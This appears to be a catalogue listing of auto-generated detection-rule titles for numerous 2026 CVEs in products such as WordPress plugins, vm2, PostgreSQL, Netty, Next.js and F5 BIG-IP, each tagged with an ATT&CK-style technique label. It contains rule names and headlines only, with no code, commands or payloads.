Web Application Exploitation Attempt — CVE-2026-41964
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41964: High-Severity Web Permission Control Vuln...
🛡️ 2 more rules via /detect
CVE-2026-8398: DAEMON Tools Lite Trojanized Binaries - DTHelper.exe
🌐 NVDT1195.002 — Compromise Infrastructure
Auto-generated from CVE-2026-8398: DAEMON Tools Lite Supply Chain Compromise
🛡️ 3 more rules via /detect
CVE-2026-6403 - WordPress Quick Playground Path Traversal
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Quick Playground Plugin Path Traversal (CVE-202...
🛡️ 2 more rules via /detect
CVE-2026-6228: WordPress Frontend Admin Plugin Privilege Escalation via Role Manipulation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6228: WordPress Frontend Admin Plugin Privilege ...
🛡️ 2 more rules via /detect
WordPress Form Notify Plugin Authentication Bypass via LINE OAuth Cookie - CVE-2026-5229
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Form Notify Plugin: Critical Authentication Byp...
🛡️ 1 more rules via /detect
CVE-2026-4094: WooCommerce Currency Switcher Data Loss via woocs_reset parameter
🌐 NVDT1531 — Impact
Auto-generated from CVE-2026-4094: WooCommerce Currency Switcher Plugin Vulne...
🛡️ 2 more rules via /detect
CVE-2026-41702 - VMware Fusion TOCTOU Privilege Escalation
🌐 NVDT1068 — Privilege Escalation
Auto-generated from VMware Fusion TOCTOU Flaw Grants Root Privileges
🛡️ 1 more rules via /detect
Musetheque V4 CSRF - Unexpected Operation Attempt - CVE-2026-28761
🌐 NVDT1190 — Initial Access
Auto-generated from Musetheque V4 CSRF Vulnerability (CVE-2026-28761) Poses H...
🛡️ 1 more rules via /detect
CVE-2026-2652 - Unauthenticated Access to MLflow Job API
🌐 NVDT1190 — Initial Access
Auto-generated from mlflow Unauthenticated Access: FastAPI Routes Exposed in ...
🛡️ 2 more rules via /detect
ZITADEL LDAP Filter Injection Attempt (CVE-2026-44671)
🌐 NVDT1190 — Initial Access
Auto-generated from ZITADEL LDAP Filter Injection Exposes Usernames, Attributes
🛡️ 2 more rules via /detect
CVE-2026-45370: python-utcp Environment Variable Leakage
🌐 NVDT1056.001 — Credential Access
Auto-generated from CVE-2026-45370: python-utcp Exposes Process Secrets via E...
🛡️ 1 more rules via /detect
CVE-2026-45369: Python-UTCP RCE via Unsanitized Shell Commands
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-45369: Python-UTCP RCE via Unsanitized Shell Com...
🛡️ 2 more rules via /detect
CVE-2026-44673: libyang LYB Heap Corruption via Malicious Blob
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-44673: libyang Integer Overflow Leads to Heap Co...
🛡️ 1 more rules via /detect
PrestaShop Customer Service XSS - Contact Form Submission - CVE-2026-44212
🌐 NVDT1190 — Initial Access
Auto-generated from PrestaShop XSS: Critical Back-Office Takeover via Custome...
🛡️ 2 more rules via /detect
CVE-2026-8634: Crabbox Environment Variable Exposure to Remote Command
🌐 NVDT1059.003 — Execution
Auto-generated from CVE-2026-8634: Crabbox Environment Variable Exposure Crit...
🛡️ 1 more rules via /detect
CVE-2026-8629: Crabbox Privilege Escalation via Ticket Endpoint Access
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-8629: Crabbox Privilege Escalation Puts Shared E...
🛡️ 2 more rules via /detect
CVE-2026-8597: Suspicious Pickle Payload Deserialization in SageMaker Triton Inference
🌐 NVDT1059.001 — Execution
Auto-generated from Amazon SageMaker Python SDK: RCE via Missing Integrity Ve...
🛡️ 2 more rules via /detect
CVE-2026-8596 - SageMaker SDK ModelBuilder HMAC Key Extraction
🌐 NVDT1505.003 — Persistence
Auto-generated from Amazon SageMaker Python SDK: CVE-2026-8596 Allows Code Ex...
🛡️ 1 more rules via /detect
CVE-2026-44637 - Libsixel Heap Write via Integer Overflow
🌐 NVDT1204.002 — Execution
Auto-generated from libsixel Signed Integer Overflow (CVE-2026-44637) Leads t...
🛡️ 2 more rules via /detect
CVE-2026-44636: libsixel Integer Overflow Heap Overflow Attempt
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-44636: libsixel Integer Overflow Leads to Heap B...
🛡️ 1 more rules via /detect
CVE-2026-43909: OpenImageIO Out-of-Bounds Read/Write via DPX Processing
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-43909: OpenImageIO Vulnerability Exposes Apps to...
🛡️ 1 more rules via /detect
CVE-2026-43908: OpenImageIO Integer Overflow RCE Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from OpenImageIO CVE-2026-43908: High-Severity Integer Overflo...
🛡️ 2 more rules via /detect
CVE-2026-43907: OpenImageIO DPX Heap Overflow via Crafted File
🌐 NVDT1204.002 — Execution
Auto-generated from OpenImageIO CVE-2026-43907: Heap Overflow in DPX Processing
🛡️ 2 more rules via /detect
CVE-2026-8621: Crabbox Authentication Bypass via Spoofed Headers
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from CVE-2026-8621: Crabbox Authentication Bypass Allows Imper...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-45375
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45375: Critical XSS in SiYuan Knowledge Manageme...
🛡️ 2 more rules via /detect
CVE-2026-44633 - Live Helper Chat API Unauthorized Chat Tampering
🌐 NVDT1190 — Initial Access
Auto-generated from Live Helper Chat REST API Vulnerability Allows Unauthoriz...
🛡️ 2 more rules via /detect
CVE-2026-44592 - Unauthenticated Gradient Worker Registration
🌐 NVDT1190 — Initial Access
Auto-generated from Gradient CI/CD System Critical Vulnerability Allows Unaut...
🛡️ 2 more rules via /detect
CVE-2026-44586: SiYuan Bazaar Metadata XSS to RCE via Node.js API Call
🌐 NVDT1059.001 — Execution
Auto-generated from CVE-2026-44586: SiYuan Stored XSS Leads to RCE in Desktop...
🛡️ 2 more rules via /detect
CVE-2026-44542: FileBrowser Quantum Path Traversal Deletion
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44542: Critical Path Traversal in FileBrowser Qu...
🛡️ 1 more rules via /detect
CVE-2026-42897: Microsoft Exchange Server XSS Exploit Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Exchange Server XSS Allows Network Spoofing (CV...
🛡️ 2 more rules via /detect
CVE-2026-42334 - Mongoose Query Sanitization Bypass via $nor Operator
🌐 NVDT1190 — Initial Access
Auto-generated from Mongoose Query Sanitization Bypass Via $nor Operator (CVE...
🛡️ 2 more rules via /detect
Microsoft Authenticator Info Disclosure Attempt (CVE-2026-41615) - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Microsoft Authenticator Critical Info Disclosure (CVE-202...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-15024
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-15024: Yordam Library Automation System Code Inj...
🛡️ 2 more rules via /detect
CVE-2025-15023: Yordam Library System Authorization Flaw - Unauthenticated Access Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-15023: Yordam Library System Authorization Flaw
🛡️ 2 more rules via /detect
Web Shell Activity Detection — CVE-2026-44827
🌐 NVDT1505.003 — Persistence
Auto-generated from Diffusers RCE: Hugging Face Pipeline Loading Bypasses `tr...
🛡️ 2 more rules via /detect
CVE-2026-44516: Valtimo Sensitive Data Logging in HTTP Errors
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44516: Valtimo Logs Sensitive Data Regardless of...
🛡️ 2 more rules via /detect
CVE-2026-44513: Diffusers RCE via custom_pipeline bypass
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44513: Diffusers RCE Bypasses trust_remote_code ...
🛡️ 2 more rules via /detect
CVE-2026-44511: Katalyst Koi Admin Session Persistence After Logout
🌐 NVDT1078.004 — Persistence
Auto-generated from CVE-2026-44511: Katalyst Koi Admin Sessions Persist After...
🛡️ 1 more rules via /detect
CVE-2026-42555: Valtimo SpEL Injection via Document API
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42555: Valtimo RCE Via Spring Expression Language
🛡️ 3 more rules via /detect
CVE-2026-20224 - Cisco Catalyst SD-WAN Manager XXE Arbitrary File Read
🌐 NVDT1190 — Initial Access
Auto-generated from Cisco Catalyst SD-WAN Manager XXE Flaw Allows Arbitrary F...
🛡️ 2 more rules via /detect
CVE-2026-20182: Cisco SD-WAN Authentication Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-20182: Critical Authentication Bypass in Cisco S...
🛡️ 2 more rules via /detect
CVE-2026-42283: DevSpace UI WebSocket Connection to Localhost
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42283: DevSpace UI WebSocket Exposes Developer E...
🛡️ 2 more rules via /detect
CVE-2026-40893: Gotenberg Arbitrary File Manipulation via FileName Tag
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-40893: Gotenberg Allows Arbitrary File Manipulation
🛡️ 2 more rules via /detect
CVE-2026-44482: SoundCloud Client RCE via Malicious Track Metadata
🌐 NVDT1204.002 — Execution
Auto-generated from CVE-2026-44482: SoundCloud Client RCE via Malicious Track...
🛡️ 2 more rules via /detect
CVE-2026-44375: Nerdbank.MessagePack Stack Overflow via Oversized Timestamp Extension
🌐 NVDT1190 — Initial Access
Auto-generated from Nerdbank.MessagePack Stack Overflow Vulnerability (CVE-20...
🛡️ 1 more rules via /detect
CVE-2026-42559: RMCP Rust SDK Host Header DNS Rebinding Attempt
🌐 NVDT1189 — Initial Access
Auto-generated from CVE-2026-42559: RMCP Rust SDK Vulnerable to DNS Rebinding
🛡️ 2 more rules via /detect
CVE-2026-42457 - vCluster Platform Stored XSS via templateRef Name
🌐 NVDT1190 — Initial Access
Auto-generated from vCluster Platform Critical XSS (CVE-2026-42457) Bypasses ...
🛡️ 2 more rules via /detect
CVE-2026-41937: Vvveb Plugin Upload for RCE
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-41937: Vvveb Unrestricted File Upload Enables RC...
🛡️ 2 more rules via /detect
Vvveb Uncontrolled Recursion DoS Attempt - CVE-2026-41935
🌐 NVDT1499 — Impact
Auto-generated from Vvveb Prior to 1.0.8.3 Vulnerable to DoS via Uncontrolled...
🛡️ 1 more rules via /detect
CVE-2026-6637: PostgreSQL refint Module RCE via Stack Buffer Overflow
🌐 NVDT1059.004 — Execution
Auto-generated from CVE-2026-6637: PostgreSQL 'refint' Module Allows RCE, SQLi
🛡️ 2 more rules via /detect
CVE-2026-6479 - PostgreSQL Uncontrolled Recursion DoS via AF_UNIX Socket
🌐 NVDT1499 — Impact
Auto-generated from PostgreSQL Denial-of-Service Vulnerability: CVE-2026-6479...
🛡️ 2 more rules via /detect
CVE-2026-6477: PostgreSQL libpq Stack Buffer Overflow via lo_export
🌐 NVDT1210 — Lateral Movement
Auto-generated from CVE-2026-6477: PostgreSQL libpq Vulnerability Allows Supe...
🛡️ 2 more rules via /detect
CVE-2026-6476: PostgreSQL pg_createsubscriber SQL Injection
🌐 NVDT1190 — Initial Access
Auto-generated from PostgreSQL CVE-2026-6476: SQL Injection Grants Superuser ...
🛡️ 2 more rules via /detect
CVE-2026-6475: PostgreSQL pg_basebackup/pg_rewind Symlink to Bashrc Overwrite
🌐 NVDT1574.006 — Persistence
Auto-generated from CVE-2026-6475: PostgreSQL Symlink Vulnerability Allows Su...
🛡️ 2 more rules via /detect
CVE-2026-6473 PostgreSQL Integer Wraparound RCE - Process Creation
🌐 NVDT1190 — Initial Access
Auto-generated from PostgreSQL Vulnerability CVE-2026-6473 Allows Remote Code...
🛡️ 2 more rules via /detect
CVE-2025-15025: Yordam Library System Authorization Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-15025: Yordam Library System Authorization Bypas...
🛡️ 1 more rules via /detect
WordPress Database Backup Plugin Auth Bypass - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from Database Backup for WordPress Plugin Vulnerable to Auth B...
🛡️ 2 more rules via /detect
CVE-2026-4030: WordPress Database Backup Plugin Arbitrary File Read
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-4030: WordPress Plugin Exposes Multisite Files t...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2025-12008
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-12008: Yaay Social Media App Authorization Bypas...
🛡️ 3 more rules via /detect
CVE-2026-2347: Akilli E-Commerce Authorization Bypass via User-Controlled Key
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-2347: Critical Authorization Bypass in Akilli E-...
🛡️ 2 more rules via /detect
CVE-2025-11024: Akilli E-Commerce Blind SQLi in Product Search
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2025-11024: Akilli E-Commerce Blind SQLi Critical Vul...
🛡️ 2 more rules via /detect
WordPress InfusedWoo Pro Arbitrary File Read - popup_submit - CVE-2026-6514
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress InfusedWoo Pro Plugin Vulnerable to Arbitrary F...
🛡️ 1 more rules via /detect
CVE-2026-6512: InfusedWoo Pro Authorization Bypass - Post Deletion
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6512: Critical Authorization Bypass in InfusedWo...
🛡️ 2 more rules via /detect
CVE-2026-6510: InfusedWoo Pro Unauthenticated Privilege Escalation via AJAX Handler
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6510: Critical Privilege Escalation in InfusedWo...
🛡️ 1 more rules via /detect
CVE-2026-6271: WordPress Career Section Plugin Arbitrary File Upload
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-6271: WordPress Career Section Plugin RCE via Fi...
🛡️ 2 more rules via /detect
WordPress Fluent Forms exportEntries IDOR - CVE-2026-5395
🌐 NVDT1190 — Initial Access
Auto-generated from WordPress Fluent Forms IDOR Exposes Sensitive Data, Bypas...
🛡️ 2 more rules via /detect
Exploitation Attempt — CVE-2026-3892
🌐 NVDvulnerability — event-type
Auto-generated from WordPress Motors Plugin: Authenticated File Deletion Vuln...
CVE-2026-3718 - ManageWP Worker Plugin Unauthenticated XSS via MWP-Key-Name Header
🌐 NVDT1190 — Initial Access
Auto-generated from ManageWP Worker Plugin Vulnerable to Unauthenticated XSS ...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-8181
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-8181: WordPress Burst Statistics Plugin Critical...
🛡️ 3 more rules via /detect
GitLab CVE-2026-7481: Developer XSS in User Profile
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab CVE-2026-7481: Developer XSS Vulnerability Patched
🛡️ 2 more rules via /detect
GitLab EE Customizable Dashboard XSS - CVE-2026-7377
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab EE XSS (CVE-2026-7377) Allows JavaScript Execution...
🛡️ 2 more rules via /detect
GitLab XSS via Improper Input Sanitization - CVE-2026-6073
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab XSS Vulnerability (CVE-2026-6073) Puts User Sessio...
🛡️ 1 more rules via /detect
Fluent Forms CVE-2026-5396 Authorization Bypass - Form Submission Access
🌐 NVDT1190 — Initial Access
Auto-generated from Fluent Forms CVE-2026-5396: Authorization Bypass Threaten...
🛡️ 2 more rules via /detect
GitLab Unauthenticated DoS Attempt - CVE-2026-1659
🌐 NVDT1499 — Impact
Auto-generated from GitLab CVE-2026-1659: Unauthenticated DoS Risk Patched
GitLab CVE-2025-14870 Unauthenticated DoS via Crafted JSON Payload
🌐 NVDT1190 — Initial Access
Auto-generated from GitLab CVE-2025-14870: Unauthenticated DoS Risk in CE/EE
GitLab Unauthenticated DoS via API - CVE-2025-14869
🌐 NVDT1499 — Impact
Auto-generated from GitLab DoS Vulnerability (CVE-2025-14869) Impacts Unauthe...
🛡️ 2 more rules via /detect
CVE-2026-46446: SOGo SQL Injection Attempt via c_password Parameter
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-46446: SOGo SQL Injection Exposes Cleartext Pass...
🛡️ 2 more rules via /detect
CVE-2026-46445: SOGo PostgreSQL SQL Injection Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-46445: High-Severity SQL Injection Impacts SOGo ...
🛡️ 2 more rules via /detect
Yubico webauthn-server-core Impersonation Attempt - CVE-2026-46419
🌐 NVDT1190 — Initial Access
Auto-generated from Yubico webauthn-server-core Vulnerability Leads to Impers...
🛡️ 1 more rules via /detect
Privilege Escalation via Improper Authorization - CVE-2026-32991
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-32991: Team Member Privilege Escalation to Owner...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-29206
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-29206: SQL Injection in sqloptimizer via Slow Qu...
🛡️ 3 more rules via /detect
OPNsense RCE via DHCP Input - CVE-2026-45158
🌐 NVDT1059.004 — Execution
Auto-generated from OPNsense RCE: Critical Flaw Allows Root Access via DHCP I...
🛡️ 2 more rules via /detect
CVE-2026-44478: Unauthenticated Hoppscotch Onboarding Config Leak
🌐 NVDT1190 — Initial Access
Auto-generated from Hoppscotch CVE-2026-44478: Unauthenticated Infrastructure...
🛡️ 1 more rules via /detect
CVE-2026-44471: gitoxide Symlink Creation in Unexpected Directories
🌐 NVDT1571 — Defense Evasion
Auto-generated from CVE-2026-44471: gitoxide Symlink Vulnerability Exposes Fi...
🛡️ 2 more rules via /detect
ERPNext SQL Injection Attempt via Specific Endpoint - CVE-2026-44447
🌐 NVDT1190 — Initial Access
Auto-generated from ERPNext SQL Injection (CVE-2026-44447) Exposes Sensitive ...
🛡️ 2 more rules via /detect
CVE-2026-44446: ERPNext SQL Injection via crafted URI query
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44446: ERPNext SQL Injection Exposes Sensitive Data
🛡️ 2 more rules via /detect
ERPNext Authorization Bypass Attempt - Specific Endpoints (CVE-2026-44442)
🌐 NVDT1190 — Initial Access
Auto-generated from ERPNext Critical Authorization Bypass (CVE-2026-44442)
🛡️ 2 more rules via /detect
CVE-2026-44194 - OPNsense User Management RCE via Malformed Email
🌐 NVDT1059.004 — Execution
Auto-generated from OPNsense RCE: Critical Flaw Allows Root Access Via Malfor...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-44193
🌐 NVDT1190 — Initial Access
Auto-generated from OPNsense RCE Vulnerability (CVE-2026-44193) Exposes Firew...
🛡️ 2 more rules via /detect
CVE-2026-32993: Unauthenticated HTTP Header Injection via /unprotected/nova_error
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-32993: Unauthenticated HTTP Header Injection Vul...
🛡️ 2 more rules via /detect
CVE-2026-32992: DNS Cluster SSL Verification Disabled - Potential MiTM
🌐 NVDT1557.001 — Lateral Movement
Auto-generated from CVE-2026-32992: DNS Cluster SSL Verification Disabled, Hi...
🛡️ 2 more rules via /detect
CVE-2026-29205: Arbitrary File Read via cpdavd Attachment Download Endpoint
🌐 NVDT1040 — Credential Access
Auto-generated from CVE-2026-29205: Arbitrary File Read via cpdavd Endpoints
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-45714
🌐 NVDT1190 — Initial Access
Auto-generated from CubeCart CVE-2026-45714: Authenticated RCE Via Template I...
🛡️ 3 more rules via /detect
CubeCart RCE via Invoice Editor - PHP Code Injection - CVE-2026-45708
🌐 NVDT1190 — Initial Access
Auto-generated from CubeCart RCE (CVE-2026-45708) Allows Unauthenticated Remo...
🛡️ 2 more rules via /detect
CVE-2026-45229 - Quark Drive POST /update Mass Assignment
🌐 NVDT1190 — Initial Access
Auto-generated from Quark Drive Mass Assignment Flaw Grants Admin Takeover
🛡️ 2 more rules via /detect
CVE-2026-45055: CubeCart Password Reset Host Header Manipulation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-45055: CubeCart Password Reset Flaw Leads to Acc...
🛡️ 2 more rules via /detect
CubeCart RCE via Arbitrary File Upload - Webshell Upload - CVE-2026-45053
🌐 NVDT1190 — Initial Access
Auto-generated from CubeCart RCE: Critical Flaw Exposes E-commerce Stores to ...
🛡️ 2 more rules via /detect
CVE-2026-44377: CubeCart SSTI RCE via Smarty Template Injection
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44377: Critical RCE in CubeCart eCommerce Platform
🛡️ 3 more rules via /detect
CVE-2026-42602: Azure Authenticator Extension Authentication Bypass via Host Header Manipulation
🌐 NVDT1078.004 — Defense Evasion
Auto-generated from CVE-2026-42602: Azure Authenticator Extension Authenticat...
🛡️ 2 more rules via /detect
CVE-2026-42304: Twisted DNS DoS - Chained Pointer Attack
🌐 NVDT1499 — Denial of Service
Auto-generated from CVE-2026-42304: Twisted DNS DoS Freezes Servers with Chai...
🛡️ 1 more rules via /detect
CubeCart Authenticated Time-Based Blind SQLi - CVE-2026-39358
🌐 NVDT1190 — Initial Access
Auto-generated from CubeCart SQLi Vulnerability (CVE-2026-39358) Exposes E-co...
🛡️ 2 more rules via /detect
HCL BigFix SCM Reporting XSS via Outdated jQuery - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from HCL BigFix SCM Reporting Site Vulnerable to XSS via Outda...
🛡️ 2 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-44351
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44351: Critical fast-jwt Auth Bypass via Empty Key
🛡️ 3 more rules via /detect
CVE-2026-42552: Flight PHP Framework Default Error Handler Information Leak
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42552: Flight PHP Framework Leaks Critical Serve...
🛡️ 1 more rules via /detect
CVE-2026-42551: Flight PHP Framework CSRF via Method Override
🌐 NVDT1190 — Initial Access
Auto-generated from Flight PHP Framework CVE-2026-42551: CSRF & Cache Poisoni...
🛡️ 2 more rules via /detect
CVE-2026-42550: Flight PHP Framework SQL Injection via Malicious Array Keys
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42550: Flight PHP Framework SQL Injection Vulner...
🛡️ 2 more rules via /detect
CVE-2026-33377: Dashboard Privilege Escalation via Unauthorized Overwrite
🌐 NVDT1078.004 — Privilege Escalation
Auto-generated from CVE-2026-33377: Dashboard Privilege Escalation Vulnerability
🛡️ 1 more rules via /detect
CVE-2026-33376: Auth Proxy IPv6 Bypass Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-33376: IPv6 Auth Proxy Bypass Risk
🛡️ 2 more rules via /detect
CVE-2026-42587 - Netty Brotli Decompression Bomb DoS
🌐 NVDT1499 — Impact
Auto-generated from Netty DoS Vulnerability (CVE-2026-42587) Bypasses Decompr...
🛡️ 3 more rules via /detect
CVE-2026-42584: Netty HTTP/2 Data Corruption Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42584: Netty HTTP/2 Handling Vulnerability Expos...
🛡️ 1 more rules via /detect
CVE-2026-42583: Netty Lz4FrameDecoder Excessive Allocation Attempt
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42583: Netty Lz4FrameDecoder Vulnerability Expos...
🛡️ 1 more rules via /detect
Web Application Exploitation Attempt — CVE-2026-42582
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42582: Netty QpackDecoder Vulnerability Exposes ...
🛡️ 3 more rules via /detect
CVE-2026-42579 - Netty DNS Codec Malformed Domain Name Encoding
🌐 NVDT1071.004 — Command and Control
Auto-generated from Netty DNS Codec Vulnerability (CVE-2026-42579) Exposes Sy...
🛡️ 1 more rules via /detect
Netty CVE-2026-42577 Stale Connection CPU Busy-Loop
🌐 NVDT1190 — Initial Access
Auto-generated from Netty CVE-2026-42577: Stale Connections Lead to 100% CPU ...
CVE-2026-33583 - Arqit Symmetric Key Exposure via HTTP GET
🌐 NVDT1190 — Initial Access
Auto-generated from Arqit Symmetric Key Agreement Platform Exposes Critical K...
🛡️ 2 more rules via /detect
CVE-2026-30906 - Zoom Rooms Installer Privilege Escalation
🌐 NVDT1574.001 — Privilege Escalation
Auto-generated from Zoom Rooms Installer: High-Severity Privilege Escalation ...
🛡️ 1 more rules via /detect
CVE-2026-30905 - Zoom VDI Plugin Local Privilege Escalation via UNC Path
🌐 NVDT1068 — Privilege Escalation
Auto-generated from Zoom Workplace VDI Plugin Vulnerability Allows Local Priv...
🛡️ 1 more rules via /detect
CVE-2026-45411 - vm2 Sandbox Escape via Async Generator Exception Handling
🌐 NVDT1059.003 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-45411) Poses Critical RCE Risk
🛡️ 2 more rules via /detect
CVE-2026-45109: Next.js Middleware Bypass via Turbopack
🌐 NVDT1190 — Initial Access
Auto-generated from Next.js CVE-2026-45109: Middleware Bypass Via Turbopack
CVE-2026-44579 - Next.js Partial Prerendering DoS via Crafted POST
🌐 NVDT1499 — Impact
Auto-generated from Next.js Partial Prerendering Vulnerability: DoS via Conne...
🛡️ 1 more rules via /detect
CVE-2026-44578 - Next.js WebSocket SSRF to Cloud Metadata Endpoint
🌐 NVDT1190 — Initial Access
Auto-generated from Next.js SSRF via Crafted WebSocket Requests (CVE-2026-44578)
🛡️ 2 more rules via /detect
CVE-2026-44009: vm2 Sandbox Escape Attempt via Malicious Script Execution
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-44009: Critical vm2 Sandbox Escape Threatens Nod...
🛡️ 2 more rules via /detect
vm2 Sandbox Escape via neutralizeArraySpeciesBatch - CVE-2026-44008
🌐 NVDT1068 — Privilege Escalation
Auto-generated from CVE-2026-44008: Critical vm2 Sandbox Escape in Node.js
🛡️ 2 more rules via /detect
CVE-2026-44007 - vm2 Sandbox Escape via Nested VM Creation
🌐 NVDT1059.003 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-44007) Allows Arbitrary OS C...
🛡️ 2 more rules via /detect
vm2 Sandbox Escape via BaseHandler.getPrototypeOf - CVE-2026-44006
🌐 NVDT1059.006 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-44006) Poses Critical Threat...
🛡️ 2 more rules via /detect
DLL Side-Loading Detection
🌐 NVDT1574.002 — Persistence
Auto-generated from CVE-2026-44005: Critical vm2 Sandbox Escape Threatens Nod...
🛡️ 1 more rules via /detect
CVE-2026-44004: vm2 Buffer.alloc Heap Exhaustion Attempt
🌐 NVDT1499 — Defense Evasion
Auto-generated from CVE-2026-44004: vm2 Sandbox Vulnerability Leads to Host M...
🛡️ 2 more rules via /detect
vm2 Sandbox Escape via Promise Constructor - CVE-2026-44001
🌐 NVDT1059.003 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-44001) Allows Host Node.js P...
🛡️ 1 more rules via /detect
CVE-2026-43999: vm2 Module Bypass with child_process
🌐 NVDT1059.006 — Execution
Auto-generated from CVE-2026-43999: Critical vm2 Sandbox Bypass Leads to RCE
🛡️ 2 more rules via /detect
CVE-2026-43998: vm2 Sandbox Bypass via Symlink to Load Host Module
🌐 NVDT1574.006 — Privilege Escalation
Auto-generated from CVE-2026-43998: vm2 Sandbox Bypass Leads to RCE in Node.js
🛡️ 2 more rules via /detect
vm2 Sandbox Escape Attempt via Host Object Access - CVE-2026-43997
🌐 NVDT1059.001 — Execution
Auto-generated from vm2 Sandbox Escape (CVE-2026-43997) Exposes Node.js Hosts
🛡️ 2 more rules via /detect
CVE-2026-44575 - Next.js App Router Unauthorized Access via Segment Prefetch
🌐 NVDT1190 — Initial Access
Auto-generated from Next.js App Router Flaw Bypasses Middleware Authorization
🛡️ 2 more rules via /detect
CVE-2026-44574 - Next.js Middleware Bypass via Crafted Query Parameters
🌐 NVDT1190 — Initial Access
Auto-generated from Next.js Middleware Bypass (CVE-2026-44574) Exposes Dynami...
🛡️ 1 more rules via /detect
CVE-2026-42930: BIG-IP Appliance Mode Bypass Attempt
🌐 NVDT1200 — Privilege Escalation
Auto-generated from BIG-IP Appliance Mode Bypass Vulnerability (CVE-2026-42930)
🛡️ 1 more rules via /detect
CVE-2026-42924: F5 iControl SOAP SNMP Configuration Object Creation
🌐 NVDT1190 — Initial Access
Auto-generated from CVE-2026-42924: F5 iControl SOAP Privilege Escalation
🛡️ 1 more rules via /detect
CVE-2026-42406 F5 BIG-IP/BIG-IQ Configuration Modification for RCE
🌐 NVDT1219 — Execution
Auto-generated from F5 BIG-IP, BIG-IQ CVE-2026-42406: Critical RCE for Privil...
🛡️ 2 more rules via /detect
JupyterLab PyPI Extension Manager Bypass Attempt (CVE-2026-42266) - Free Tier
🌐 NVDT1190 — Initial Access
Auto-generated from JupyterLab CVE-2026-42266: PyPI Extension Manager Bypass
🛡️ 2 more rules via /detect
CVE-2026-41957 - BIG-IP/BIG-IQ Configuration Utility RCE - Suspicious Configuration Upload
🌐 NVDT1190 — Initial Access
Auto-generated from BIG-IP, BIG-IQ Configuration Utility RCE via Authenticate...
🛡️ 2 more rules via /detect
CVE-2026-41225: iControl REST Arbitrary Command Execution via Configuration Object
🌐 NVDT1219 — Execution
Auto-generated from CVE-2026-41225: Critical iControl REST Vulnerability Allo...
🛡️ 2 more rules via /detect
CVE-2026-40698 - F5 BIG-IP/BIG-IQ Privilege Escalation via SNMP Configuration
🌐 NVDT1548.003 — Privilege Escalation
Auto-generated from F5 BIG-IP, BIG-IQ Privilege Escalation: CVE-2026-40698
🛡️ 2 more rules via /detect
Exploitation Attempt — CVE-2026-40631
🌐 NVDvulnerability — event-type
Auto-generated from CVE-2026-40631: F5 iControl SOAP Privilege Escalation
CVE-2026-40061 - F5 BIG-IP DNS Privilege Escalation via iControl REST/tmsh
🌐 NVDT1078.002 — Privilege Escalation
